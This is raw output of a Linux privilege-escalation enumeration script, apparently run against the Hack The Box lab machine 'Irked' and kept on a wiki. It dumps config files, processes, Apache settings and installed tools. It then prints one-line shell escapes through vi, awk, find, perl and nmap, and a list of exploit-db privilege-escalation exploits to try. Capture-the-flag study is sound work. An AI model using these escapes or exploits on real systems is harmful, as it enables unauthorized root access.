-rwsr-xr-x 1 root root 1105840 Dec 31 1969 /home/ircd/test/sh
[+] Logs containing keyword 'password'
[+] Config files containing keyword 'password'
/etc/bogofilter.cf:# the password database, or the user id
/etc/exim4/exim4.conf.template:# Authenticators which rely on unencrypted clear text passwords don't
/etc/exim4/exim4.conf.template:# advertise unencrypted clear text password based authenticators on all
/etc/exim4/exim4.conf.template:# preferred over allowing clear text password based authenticators on
/etc/exim4/exim4.conf.template:# use), an authentication ID, and a password. The latter two appear as
/etc/exim4/exim4.conf.template:# valid username and password. In a real configuration you would typically
/etc/exim4/exim4.conf.template:# password are $auth1 and $auth2. Apart from that you can use the same
/etc/exim4/exim4.conf.template:# Authenticate against local passwords using sasl2-bin
/etc/exim4/exim4.conf.template:# # don't send system passwords over unencrypted connections
/etc/exim4/exim4.conf.template:# They get the passwords from CONFDIR/passwd.client, whose format is
/etc/exim4/exim4.conf.template:# Because AUTH PLAIN and AUTH LOGIN send the password in clear, we
/etc/exim4/exim4.conf.template:# clear text password authentication on all connections.
/etc/firebird/2.5/firebird.conf:# If you want to disable logons with old passwords
/etc/firebird/2.5/firebird.conf:# this connection one even need not know login/password on external server.
/etc/debconf.conf:# World-readable, and accepts everything but passwords.
/etc/debconf.conf:Reject-Type: password
/etc/debconf.conf:# Not world readable (the default), and accepts only passwords.
/etc/debconf.conf:Name: passwords
/etc/debconf.conf:Accept-Type: password
/etc/debconf.conf:Filename: /var/cache/debconf/passwords.dat
/etc/debconf.conf:# databases, one to hold passwords and one for everything else.
/etc/debconf.conf:Stack: config, passwords
/etc/debconf.conf:# A remote LDAP database. It is also read-only. The password is really
/etc/ssl/openssl.cnf:# input_password = secret
/etc/ssl/openssl.cnf:# output_password = secret
/etc/ssl/openssl.cnf:challengePassword = A challenge password
/etc/cracklib/cracklib.conf:# passwords should not match. The files may optionally be compressed
/etc/apache2/sites-available/default-ssl.conf: # Note that no password is obtained from the user. Every entry in the user
/etc/apache2/sites-available/default-ssl.conf: # file needs this password: `xxj31ZMTZzkVA'.
/etc/security/pwquality.conf:# Configuration for systemwide password quality limits
/etc/security/pwquality.conf:# Number of characters in the new password that must not be present in the
/etc/security/pwquality.conf:# old password.
/etc/security/pwquality.conf:# Minimum acceptable size for the new password (plus one if
/etc/security/pwquality.conf:# The maximum credit for having digits in the new password. If less than 0
/etc/security/pwquality.conf:# it is the minimum number of digits in the new password.
/etc/security/pwquality.conf:# The maximum credit for having uppercase characters in the new password.
/etc/security/pwquality.conf:# password.
/etc/security/pwquality.conf:# The maximum credit for having lowercase characters in the new password.
/etc/security/pwquality.conf:# password.
/etc/security/pwquality.conf:# The maximum credit for having other characters in the new password.
/etc/security/pwquality.conf:# password.
/etc/security/pwquality.conf:# password (digits, uppercase, lowercase, others).
/etc/security/pwquality.conf:# The maximum number of allowed consecutive same characters in the new password.
/etc/security/pwquality.conf:# new password.
/etc/reportbug.conf:# Username and password for SMTP
[+] Shadow File (Privileged)
[*] ENUMERATING PROCESSES AND APPLICATIONS...
[+] Installed Packages
Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend
Err?=(none)/Reinst-required (Status,Err:
Name Version Description
zlib1g:i386 1:1.2.8.dfsg-2+b1 compression library - runtime
[+] Current processes
USER PID START TIME COMMAND
root 1 06:40 0:02 /sbin/init
root 2 06:40 0:00 [kthreadd]
root 3 06:40 0:11 [ksoftirqd/0]
root 5 06:40 0:00 [kworker/0:0H]
root 7 06:40 0:11 [rcu_sched]
root 8 06:40 0:00 [rcu_bh]
root 9 06:40 0:00 [migration/0]
root 10 06:40 0:00 [watchdog/0]
root 11 06:40 0:00 [khelper]
root 12 06:40 0:00 [kdevtmpfs]
root 13 06:40 0:00 [netns]
root 14 06:40 0:00 [khungtaskd]
root 15 06:40 0:00 [writeback]
root 16 06:40 0:00 [ksmd]
root 17 06:40 0:00 [khugepaged]
root 18 06:40 0:00 [crypto]
root 19 06:40 0:00 [kintegrityd]
root 20 06:40 0:00 [bioset]
root 21 06:40 0:00 [kblockd]
root 23 06:40 0:00 [kswapd0]
root 24 06:40 0:00 [vmstat]
root 25 06:40 0:00 [fsnotify_mark]
root 31 06:40 0:00 [kthrotld]
root 32 06:40 0:00 [ipv6_addrconf]
root 33 06:40 0:00 [deferwq]
root 34 06:40 0:00 [kworker/u2:1]
root 68 06:40 0:00 [ata_sff]
root 69 06:40 0:00 [mpt_poll_0]
root 70 06:40 0:00 [khubd]
root 71 06:40 0:00 [mpt/0]
root 72 06:40 0:00 [kpsmoused]
root 75 06:40 0:00 [scsi_eh_0]
root 76 06:40 0:00 [scsi_tmf_0]
root 77 06:40 0:00 [scsi_eh_1]
root 78 06:40 0:00 [kworker/u2:2]
root 80 06:40 0:00 [scsi_tmf_1]
root 81 06:40 0:00 [scsi_eh_2]
root 82 06:40 0:00 [scsi_tmf_2]
root 85 06:40 0:00 [kworker/0:1H]
root 107 06:40 0:00 [jbd2/sda1-8]
root 108 06:40 0:00 [ext4-rsv-conver]
root 139 06:40 0:00 [kauditd]
root 151 06:40 0:00 /lib/systemd/systemd-udevd
root 152 06:40 0:00 /lib/systemd/systemd-journald
root 194 06:40 0:00 [ttm_swap]
root 461 06:40 0:00 /sbin/rpcbind
statd 470 06:40 0:00 /sbin/rpc.statd
root 476 06:40 0:00 [rpciod]
root 478 06:40 0:00 [nfsiod]
root 485 06:40 0:00 /usr/sbin/rpc.idmapd
root 487 06:40 0:00 /usr/lib/accountsservice/accounts-daemon
root 489 06:40 0:00 /usr/sbin/NetworkManager
root 490 06:40 0:07 /usr/bin/vmtoolsd
root 491 06:40 0:00 /usr/sbin/rsyslogd
root 493 06:40 0:00 /usr/sbin/ModemManager
avahi 494 06:40 0:00 avahi-daemon:
daemon 495 06:40 0:00 /usr/sbin/atd
root 498 06:40 0:00 /usr/sbin/cron
avahi 502 06:40 0:00 avahi-daemon:
message+ 503 06:40 0:00 /usr/bin/dbus-daemon
root 514 06:40 0:00 /lib/systemd/systemd-logind
root 539 06:40 0:00 /usr/sbin/cups-browsed
root 543 06:40 0:00 /usr/sbin/acpid
root 545 06:40 0:00 /usr/sbin/minissdpd
root 549 06:40 0:00 /usr/sbin/sshd
root 553 06:40 0:00 [cfg80211]
root 561 06:40 0:00 /usr/lib/policykit-1/polkitd
ircd 599 06:40 0:00 /lib/systemd/systemd
root 603 06:40 0:00 /usr/sbin/gdm3
ircd 613 06:40 0:00 (sd-pam)
root 631 06:40 0:00 /usr/bin/Xorg
root 650 06:40 0:00 sshd:
ircd 654 06:40 0:01 /home/ircd/Unreal3.2/src/ircd
root 863 06:40 0:00 /usr/sbin/apache2
Debian-+ 925 06:40 0:00 /usr/sbin/exim4
root 933 06:40 0:00 gdm-session-worker
Debian-+ 936 06:40 0:00 /lib/systemd/systemd
Debian-+ 937 06:40 0:00 (sd-pam)
Debian-+ 939 06:40 0:00 /usr/bin/gnome-session
Debian-+ 942 06:40 0:00 /usr/bin/dbus-launch
Debian-+ 943 06:40 0:00 /usr/bin/dbus-daemon
Debian-+ 946 06:40 0:00 /usr/lib/at-spi2-core/at-spi-bus-launcher
Debian-+ 950 06:40 0:00 /usr/bin/dbus-daemon
Debian-+ 953 06:40 0:00 /usr/lib/at-spi2-core/at-spi2-registryd
Debian-+ 961 06:40 0:00 /usr/lib/gnome-settings-daemon/gnome-settings-daemon
root 966 06:40 0:00 /sbin/agetty
root 971 06:40 0:00 /usr/lib/upower/upowerd
Debian-+ 984 06:40 0:06 gnome-shell
colord 985 06:40 0:00 /usr/lib/colord/colord
Debian-+ 999 06:40 0:00 /usr/bin/pulseaudio
rtkit 1000 06:40 0:00 /usr/lib/rtkit/rtkit-daemon
Debian-+ 1018 06:40 0:00 /usr/lib/dconf/dconf-service
root 1027 06:40 0:00 /sbin/wpa_supplicant
root 1030 06:40 0:00 /usr/lib/packagekit/packagekitd
ircd 1044 06:41 0:00 perl
djmardov 1045 06:41 0:00 /lib/systemd/systemd
djmardov 1046 06:41 0:00 (sd-pam)
djmardov 1048 06:41 0:01 sshd:
djmardov 1049 06:41 0:00 -bash
ircd 1071 06:41 0:00 sh
ircd 1072 06:41 0:00 python
ircd 1073 06:41 0:00 /bin/bash
www-data 1302 06:45 0:00 /usr/sbin/apache2
root 1307 06:45 0:00 /usr/sbin/cupsd
www-data 1376 06:45 2:03 /usr/sbin/apache2
www-data 1377 06:45 2:02 /usr/sbin/apache2
root 1448 06:46 0:00 sshd:
djmardov 1454 06:46 0:00 sshd:
djmardov 1455 06:46 0:00 /usr/lib/openssh/sftp-server
root 2828 06:58 0:00 sshd:
djmardov 2830 06:58 0:00 sshd:
djmardov 2831 06:58 0:00 -bash
ircd 2859 06:59 0:00 sh
ircd 2860 06:59 0:00 telnet
ircd 2861 06:59 0:00 sh
ircd 2949 07:07 0:00 python3
ircd 2950 07:07 0:00 /bin/bash
ircd 4471 07:26 0:00 sh
ircd 4472 07:26 0:00 telnet
ircd 4473 07:26 0:00 sh
ircd 4482 07:27 0:00 python
ircd 4483 07:27 0:00 /bin/bash
ircd 6117 07:33 0:00 sh
ircd 6119 07:33 0:00 sh
ircd 6123 07:33 0:00 /usr/bin/python
ircd 6124 07:33 0:00 /bin/sh
ircd 6181 07:38 0:00 python
ircd 6200 07:39 0:00 sh
ircd 6201 07:39 0:00 /bin/bash
ircd 6273 07:43 0:00 python
ircd 6282 07:44 0:00 sh
ircd 6283 07:44 0:00 /bin/bash
ircd 6312 07:44 0:00 sh
ircd 6314 07:44 0:00 sh
ircd 6317 07:45 0:00 /usr/bin/python
ircd 6318 07:45 0:00 /bin/sh
ircd 6356 07:47 0:00 sh
ircd 6357 07:47 0:00 telnet
ircd 6358 07:47 0:00 sh
ircd 6391 07:50 0:00 sh
ircd 6392 07:50 0:00 telnet
ircd 6396 07:50 0:00 sh
ircd 6409 07:51 0:00 python3
ircd 6410 07:51 0:00 /bin/bash
ircd 7076 07:58 0:00 python
ircd 7082 07:58 0:00 sh
ircd 7083 07:58 0:00 /bin/bash
ircd 7118 08:00 0:02 python
ircd 7168 08:03 0:00 python
ircd 7169 08:03 0:00 sh
ircd 7170 08:03 0:00 /bin/sh
ircd 7182 08:06 0:00 sh
ircd 7183 08:06 0:00 telnet
ircd 7189 08:08 0:00 sh
ircd 7194 08:09 0:00 bash
ircd 7195 08:09 0:00 bash
ircd 7214 08:11 0:00 sleep
ircd 7215 08:11 0:00 telnet
ircd 7216 08:11 0:00 sh
ircd 7217 08:11 0:00 telnet
ircd 7218 08:11 0:00 sh
ircd 7226 08:12 0:00 bash
ircd 7230 08:12 0:00 sleep
ircd 7301 08:16 0:00 /bin/bash
ircd 7417 08:18 0:00 sleep
ircd 7455 08:21 0:00 python
ircd 7456 08:21 0:00 /bin/bash
ircd 7457 08:22 0:00 script
ircd 7458 08:22 0:00 script
ircd 7459 08:22 0:00 sh
ircd 7481 08:26 0:00 perl
ircd 7487 08:26 0:00 sleep
ircd 7528 08:32 0:00 sleep
ircd 7536 08:33 0:00 sleep
ircd 7537 08:33 0:00 telnet
ircd 7538 08:33 0:00 sh
ircd 7539 08:33 0:00 telnet
ircd 7540 08:33 0:00 sh
ircd 7546 08:33 0:00 /tmp/MtGtX
ircd 7578 08:37 0:00 sleep
ircd 7667 08:41 0:00 perl
ircd 7671 08:41 0:00 sleep
ircd 7672 08:41 0:00 telnet
ircd 7673 08:41 0:00 sh
ircd 7674 08:41 0:00 telnet
ircd 7675 08:41 0:00 sh
ircd 7682 08:41 0:00 sh
ircd 7683 08:41 0:00 /usr/bin/python
ircd 7684 08:41 0:00 /bin/sh
ircd 8000 08:44 0:00 python
ircd 8001 08:44 0:00 /bin/bash
ircd 8003 08:45 0:00 python
ircd 8004 08:45 0:00 /bin/bash
ircd 8005 08:45 0:00 python
ircd 8006 08:45 0:00 /bin/bash
ircd 8007 08:45 0:00 python
ircd 8008 08:45 0:00 /bin/bash
ircd 8011 08:45 0:00 python
ircd 8012 08:45 0:00 sh
ircd 8013 08:45 0:00 /bin/bash
ircd 8024 08:46 0:00 sleep
ircd 8025 08:46 0:00 telnet
ircd 8026 08:46 0:00 sh
ircd 8027 08:46 0:00 telnet
ircd 8028 08:46 0:00 sh
root 8030 08:46 0:00 sshd:
djmardov 8032 08:47 0:00 sshd:
djmardov 8035 08:47 0:00 -bash
root 8039 08:47 0:00 sshd:
djmardov 8041 08:48 0:00 sshd:
djmardov 8042 08:48 0:00 -bash
ircd 8070 08:49 0:00 /bin/sh
ircd 8078 08:49 0:00 python
ircd 8097 08:50 0:00 perl
ircd 8104 08:50 0:00 sh
ircd 8105 08:50 0:00 /usr/bin/python
ircd 8106 08:50 0:00 /bin/sh
ircd 8110 08:50 0:00 python
ircd 8356 08:50 0:00 sh
ircd 8357 08:50 0:00 /bin/sh
root 8766 08:52 0:00 sshd:
djmardov 9548 08:53 0:00 sshd:
djmardov 9549 08:53 0:00 -bash
ircd 11104 08:54 0:00 /bin/sh
root 11123 08:55 0:00 viewuser
root 11126 08:55 0:00 sh
root 11127 08:55 0:00 /bin/sh
root 11128 08:55 0:00 /bin/sh
ircd 11919 09:00 0:00 sleep
ircd 11920 09:00 0:00 telnet
ircd 11921 09:00 0:00 sh
ircd 11922 09:00 0:00 telnet
ircd 11923 09:00 0:00 sh
ircd 11929 09:00 0:00 python3
ircd 11930 09:00 0:00 /bin/sh
ircd 11944 09:01 0:00 sh
ircd 11947 09:01 0:00 /bin/bash
ircd 12694 09:02 0:00 /bin/bash
ircd 12699 09:02 0:00 python3
ircd 12700 09:02 0:00 /bin/bash
ircd 12752 09:05 0:00 sleep
ircd 12753 09:05 0:00 telnet
ircd 12754 09:05 0:00 sh
ircd 12755 09:05 0:00 telnet
ircd 12756 09:05 0:00 sh
root 12761 09:06 0:00 [kworker/0:2]
ircd 12764 09:06 0:00 perl
ircd 12773 09:06 0:00 sleep
ircd 12774 09:06 0:00 telnet
ircd 12775 09:06 0:00 sh
ircd 12776 09:06 0:00 telnet
ircd 12785 09:06 0:00 sleep
ircd 12802 09:07 0:00 sleep
ircd 12803 09:07 0:00 telnet
ircd 12804 09:07 0:00 sh
ircd 12805 09:07 0:00 telnet
ircd 12806 09:07 0:00 sh
ircd 13231 09:09 0:00 sleep
ircd 13242 09:10 0:00 sh
ircd 13248 09:10 0:00 sleep
ircd 13249 09:10 0:00 telnet
ircd 13250 09:10 0:00 sh
ircd 13251 09:10 0:00 telnet
ircd 13252 09:10 0:00 sh
root 13259 09:11 0:00 [kworker/0:0]
ircd 13262 09:11 0:00 /usr/bin/python
ircd 13263 09:11 0:00 /bin/sh
ircd 13284 09:13 0:00 sleep
ircd 13285 09:13 0:00 telnet
ircd 13286 09:13 0:00 sh
ircd 13287 09:13 0:00 telnet
ircd 13288 09:13 0:00 sh
ircd 13549 09:13 0:00 vi
root 14317 09:16 0:00 sshd:
sshd 14318 09:16 0:00 sshd:
root 14320 09:16 0:00 [kworker/0:1]
ircd 14334 09:16 0:00 ./CVE-2014-5207_fuse_suid_3.16.1.1
ircd 14337 09:16 0:00 [CVE-2014-5207_f]
ircd 14344 09:16 0:00 python
ircd 14578 09:16 0:00 /bin/sh
ircd 14579 09:16 0:00 ps
ircd 14580 09:16 0:00 awk
[+] Apache Version and Modules
[+] Apache Config File
# This is the main Apache server configuration file. It contains the
# configuration directives that give the server its instructions.
# See http://httpd.apache.org/docs/2.4/ for detailed information about
# the directives and /usr/share/doc/apache2/README.Debian about Debian specific
# hints.
#
#
# Summary of how the Apache 2 configuration works in Debian:
# The Apache 2 web server configuration in Debian is quite different to
# upstream's suggested way to configure the web server. This is because Debian's
# default Apache2 installation attempts to make adding and removing modules,
# virtual hosts, and extra configuration directives as flexible as possible, in
# order to make automating the changes and administering the server as easy as
# possible.
# It is split into several files forming the configuration hierarchy outlined
# below, all located in the /etc/apache2/ directory:
#
# /etc/apache2/
# |-- apache2.conf
# | `-- ports.conf
# |-- mods-enabled
# | |-- *.load
# | `-- *.conf
# |-- conf-enabled
# | `-- *.conf
# `-- sites-enabled
# `-- *.conf
#
#
# * apache2.conf is the main configuration file (this file). It puts the pieces
# together by including all remaining configuration files when starting up the
# web server.
#
# * ports.conf is always included from the main configuration file. It is
# supposed to determine listening ports for incoming connections which can be
# customized anytime.
#
# * Configuration files in the mods-enabled/, conf-enabled/ and sites-enabled/
# directories contain particular configuration snippets which manage modules,
# global configuration fragments, or virtual host configurations,
# respectively.
#
# They are activated by symlinking available configuration files from their
# respective *-available/ counterparts. These should be managed by using our
# helpers a2enmod/a2dismod, a2ensite/a2dissite and a2enconf/a2disconf. See
# their respective man pages for detailed information.
#
# * The binary is called apache2. Due to the use of environment variables, in
# the default configuration, apache2 needs to be started/stopped with
# /etc/init.d/apache2 or apache2ctl. Calling /usr/bin/apache2 directly will not
# work with the default configuration.
# Global configuration
#
#
# ServerRoot: The top of the directory tree under which the server's
# configuration, error, and log files are kept.
#
# NOTE! If you intend to place this on an NFS (or otherwise network)
# mounted filesystem then please read the Mutex documentation (available
# at <URL:http://httpd.apache.org/docs/2.4/mod/core.html#mutex>);
# you will save yourself a lot of trouble.
#
# Do NOT add a slash at the end of the directory path.
#
#ServerRoot "/etc/apache2"
#
# The accept serialization lock file MUST BE STORED ON A LOCAL DISK.
#
Mutex file:${APACHE_LOCK_DIR} default
#
# PidFile: The file in which the server should record its process
# identification number when it starts.
# This needs to be set in /etc/apache2/envvars
#
PidFile ${APACHE_PID_FILE}
#
# Timeout: The number of seconds before receives and sends time out.
#
Timeout 300
#
# KeepAlive: Whether or not to allow persistent connections (more than
# one request per connection). Set to "Off" to deactivate.
#
KeepAlive On
#
# MaxKeepAliveRequests: The maximum number of requests to allow
# during a persistent connection. Set to 0 to allow an unlimited amount.
# We recommend you leave this number high, for maximum performance.
#
MaxKeepAliveRequests 100
#
# KeepAliveTimeout: Number of seconds to wait for the next request from the
# same client on the same connection.
#
KeepAliveTimeout 5
# These need to be set in /etc/apache2/envvars
User ${APACHE_RUN_USER}
Group ${APACHE_RUN_GROUP}
#
# HostnameLookups: Log the names of clients or just their IP addresses
# e.g., www.apache.org (on) or 204.62.129.132 (off).
# The default is off because it'd be overall better for the net if people
# had to knowingly turn this feature on, since enabling it means that
# each client request will result in AT LEAST one lookup request to the
# nameserver.
#
HostnameLookups Off
# ErrorLog: The location of the error log file.
# If you do not specify an ErrorLog directive within a <VirtualHost>
# container, error messages relating to that virtual host will be
# logged here. If you *do* define an error logfile for a <VirtualHost>
# container, that host's errors will be logged there and not here.
#
ErrorLog ${APACHE_LOG_DIR}/error.log
#
# LogLevel: Control the severity of messages logged to the error_log.
# Available values: trace8, ..., trace1, debug, info, notice, warn,
# error, crit, alert, emerg.
# It is also possible to configure the log level for particular modules, e.g.
# "LogLevel info ssl:warn"
#
LogLevel warn
# Include module configuration:
IncludeOptional mods-enabled/*.load
IncludeOptional mods-enabled/*.conf
# Include list of ports to listen on
Include ports.conf
# Sets the default security model of the Apache2 HTTPD server. It does
# not allow access to the root filesystem outside of /usr/share and /var/www.
# The former is used by web applications packaged in Debian,
# the latter may be used for local directories served by the web server. If
# your system is serving content from a sub-directory in /srv you must allow
# access here, or in any related virtual host.
<Directory />
Options FollowSymLinks
AllowOverride None
Require all denied
</Directory>
<Directory /usr/share>
AllowOverride None
Require all granted
</Directory>
<Directory /var/www/>
Options Indexes FollowSymLinks
AllowOverride None
Require all granted
</Directory>
#<Directory /srv/>
# Options Indexes FollowSymLinks
# AllowOverride None
# Require all granted
#</Directory>
# AccessFileName: The name of the file to look for in each directory
# for additional configuration directives. See also the AllowOverride
# directive.
#
AccessFileName .htaccess
#
# The following lines prevent .htaccess and .htpasswd files from being
# viewed by Web clients.
#
<FilesMatch "^\.ht">
Require all denied
</FilesMatch>
#
# The following directives define some format nicknames for use with
# a CustomLog directive.
#
# These deviate from the Common Log Format definitions in that they use %O
# (the actual bytes sent including headers) instead of %b (the size of the
# requested file), because the latter makes it impossible to detect partial
# requests.
#
# Note that the use of %{X-Forwarded-For}i instead of %h is not recommended.
# Use mod_remoteip instead.
#
LogFormat "%v:%p %h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" vhost_combined
LogFormat "%h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" combined
LogFormat "%h %l %u %t \"%r\" %>s %O" common
LogFormat "%{Referer}i -> %U" referer
LogFormat "%{User-agent}i" agent
# Include of directories ignores editors' and dpkg's backup files,
# see README.Debian for details.
# Include generic snippets of statements
IncludeOptional conf-enabled/*.conf
# Include the virtual host configurations:
IncludeOptional sites-enabled/*.conf
# vim: syntax=apache ts=4 sw=4 sts=4 sr noet
[+] Sudo Version (Check out http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=sudo)
[*] IDENTIFYING PROCESSES AND PACKAGES RUNNING AS ROOT OR OTHER SUPERUSER...
root 8030 08:46 0:00 sshd:
root 461 06:40 0:00 /sbin/rpcbind
Possible Related Packages:
rpcbind 0.2.1-6+deb8u2 converts RPC program numbers into universal addresses
root 108 06:40 0:00 [ext4-rsv-conver]
root 70 06:40 0:00 [khubd]
root 151 06:40 0:00 /lib/systemd/systemd-udevd
root 1030 06:40 0:00 /usr/lib/packagekit/packagekitd
root 25 06:40 0:00 [fsnotify_mark]
root 491 06:40 0:00 /usr/sbin/rsyslogd
root 21 06:40 0:00 [kblockd]
root 11127 08:55 0:00 /bin/sh
root 71 06:40 0:00 [mpt/0]
root 545 06:40 0:00 /usr/sbin/minissdpd
Possible Related Packages:
minissdpd 1.2.20130907-3+deb8u1 keep memory of all UPnP devices that announced themselves
root 9 06:40 0:00 [migration/0]
root 24 06:40 0:00 [vmstat]
root 1448 06:46 0:00 sshd:
root 971 06:40 0:00 /usr/lib/upower/upowerd
root 650 06:40 0:00 sshd:
root 14 06:40 0:00 [khungtaskd]
root 631 06:40 0:00 /usr/bin/Xorg
Possible Related Packages:
xserver-xorg-core 2:1.16.4-1+deb8u2 Xorg X server - core server
root 32 06:40 0:00 [ipv6_addrconf]
root 8766 08:52 0:00 sshd:
root 485 06:40 0:00 /usr/sbin/rpc.idmapd
root 78 06:40 0:00 [kworker/u2:2]
root 13 06:40 0:00 [netns]
root 11 06:40 0:00 [khelper]
root 490 06:40 0:07 /usr/bin/vmtoolsd
root 1027 06:40 0:00 /sbin/wpa_supplicant
root 80 06:40 0:00 [scsi_tmf_1]
root 14317 09:16 0:00 sshd:
root 69 06:40 0:00 [mpt_poll_0]
root 85 06:40 0:00 [kworker/0:1H]
root 11123 08:55 0:00 viewuser
root 1307 06:45 0:00 /usr/sbin/cupsd
root 2 06:40 0:00 [kthreadd]
root 561 06:40 0:00 /usr/lib/policykit-1/polkitd
root 20 06:40 0:00 [bioset]
root 3 06:40 0:11 [ksoftirqd/0]
root 13259 09:11 0:00 [kworker/0:0]
root 33 06:40 0:00 [deferwq]
root 10 06:40 0:00 [watchdog/0]
root 18 06:40 0:00 [crypto]
root 966 06:40 0:00 /sbin/agetty
root 2828 06:58 0:00 sshd:
root 76 06:40 0:00 [scsi_tmf_0]
root 498 06:40 0:00 /usr/sbin/cron
Possible Related Packages:
anacron 2.3-23 cron-like program that doesn't go by time
cron 3.0pl1-127+deb8u1 process scheduling daemon
root 16 06:40 0:00 [ksmd]
root 489 06:40 0:00 /usr/sbin/NetworkManager
Possible Related Packages:
gir1.2-networkmanager-1.0:i386 0.9.10.0-7 GObject introspection data for NetworkManager
root 68 06:40 0:00 [ata_sff]
root 5 06:40 0:00 [kworker/0:0H]
root 17 06:40 0:00 [khugepaged]
root 933 06:40 0:00 gdm-session-worker
root 72 06:40 0:00 [kpsmoused]
root 77 06:40 0:00 [scsi_eh_1]
root 543 06:40 0:00 /usr/sbin/acpid
Possible Related Packages:
acpid 1:2.0.23-2 Advanced Configuration and Power Interface event daemon
root 75 06:40 0:00 [scsi_eh_0]
root 487 06:40 0:00 /usr/lib/accountsservice/accounts-daemon
root 107 06:40 0:00 [jbd2/sda1-8]
root 19 06:40 0:00 [kintegrityd]
root 8 06:40 0:00 [rcu_bh]
root 476 06:40 0:00 [rpciod]
root 23 06:40 0:00 [kswapd0]
root 82 06:40 0:00 [scsi_tmf_2]
root 863 06:40 0:00 /usr/sbin/apache2
Possible Related Packages:
apache2 2.4.10-10+deb8u12 Apache HTTP Server
apache2-bin 2.4.10-10+deb8u12 Apache HTTP Server (modules and other binary files)
apache2-data 2.4.10-10+deb8u12 Apache HTTP Server (common files)
apache2-doc 2.4.10-10+deb8u12 Apache HTTP Server (on-site documentation)
apache2-utils 2.4.10-10+deb8u12 Apache HTTP Server (utility programs for web servers)
libapache2-mod-dnssd 0.6-3.1 Zeroconf support for Apache 2 via avahi
root 11128 08:55 0:00 /bin/sh
root 194 06:40 0:00 [ttm_swap]
root 81 06:40 0:00 [scsi_eh_2]
root 8039 08:47 0:00 sshd:
root 11126 08:55 0:00 sh
root 14320 09:16 0:00 [kworker/0:1]
root 514 06:40 0:00 /lib/systemd/systemd-logind
root 34 06:40 0:00 [kworker/u2:1]
root 478 06:40 0:00 [nfsiod]
root 553 06:40 0:00 [cfg80211]
root 31 06:40 0:00 [kthrotld]
root 139 06:40 0:00 [kauditd]
root 549 06:40 0:00 /usr/sbin/sshd
root 493 06:40 0:00 /usr/sbin/ModemManager
root 1 06:40 0:02 /sbin/init
Possible Related Packages:
hp-ppd 0.9-0.2 HP Postscript Printer Definition (PPD) files
init 1.22 System-V-like init utilities - metapackage
init-system-helpers 1.22 helper tools for all init systems
initramfs-tools 0.120+deb8u3 generic modular initramfs generator
initscripts 2.88dsf-59 scripts for initializing and shutting down the system
insserv 1.14.0-5 boot sequence organizer using LSB init.d script dependency information
libklibc 2.0.4-2 minimal libc subset for use with initramfs
lsb-base 4.1+Debian13+nmu1 Linux Standard Base 4.1 init script functionality
ncurses-base 5.9+20140913-1+deb8u2 basic terminal type definitions
ncurses-term 5.9+20140913-1+deb8u2 additional terminal type definitions
sysvinit-utils 2.88dsf-59 System-V-like utilities
xinit 1.3.4-1 X server initialisation tool
root 7 06:40 0:11 [rcu_sched]
root 12761 09:06 0:00 [kworker/0:2]
root 539 06:40 0:00 /usr/sbin/cups-browsed
Possible Related Packages:
cups-browsed 1.0.61-5+deb8u3 OpenPrinting CUPS Filters - cups-browsed
root 603 06:40 0:00 /usr/sbin/gdm3
Possible Related Packages:
gdm3 3.14.1-7 GNOME Display Manager
gir1.2-gdm3 3.14.1-7 GObject introspection data for the GNOME Display Manager
root 15 06:40 0:00 [writeback]
root 152 06:40 0:00 /lib/systemd/systemd-journald
root 12 06:40 0:00 [kdevtmpfs]
[*] ENUMERATING INSTALLED LANGUAGES/TOOLS FOR SPLOIT BUILDING...
[+] Installed Tools
/usr/bin/awk
/usr/bin/perl
/usr/bin/python
/usr/bin/gcc
/usr/bin/cc
/usr/bin/vi
/usr/bin/nmap
/usr/bin/find
/bin/netcat
/bin/nc
/usr/bin/wget
/usr/bin/ftp
[+] Related Shell Escape Sequences...
nmap--> --interactive
vi--> :!bash
vi--> :set shell=/bin/bash:shell
awk--> awk 'BEGIN {system("/bin/bash")}'
find--> find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' \;
perl--> perl -e 'exec "/bin/bash";'
[*] FINDING RELEVENT PRIVILEGE ESCALATION EXPLOITS...
Note: Exploits relying on a compile/scripting language not detected on this system are marked with a '**' but should still be tested!
- Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit || http://www.exploit-db.com/exploits/5720 || Language=python
The following exploits are ranked higher in probability of success because this script detected a related running process, OS, or mounted file system
The following exploits are applicable to this kernel version and should be investigated as well
- Kernel ia32syscall Emulation Privilege Escalation || http://www.exploit-db.com/exploits/15023 || Language=c
- Sendpage Local Privilege Escalation || http://www.exploit-db.com/exploits/19933 || Language=ruby**
- CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit) || http://www.exploit-db.com/exploits/15944 || Language=c
- CAP_SYS_ADMIN to root Exploit || http://www.exploit-db.com/exploits/15916 || Language=c
- MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/1518 || Language=c
- open-time Capability file_ns_capable() Privilege Escalation || http://www.exploit-db.com/exploits/25450 || Language=c
- open-time Capability file_ns_capable() - Privilege Escalation Vulnerability || http://www.exploit-db.com/exploits/25307 || Language=c
Finished
=================================================================================================
-
challenges/hackthebox/machines/irked.txt · Last modified: 2020/12/15 21:37 by didzkovitchz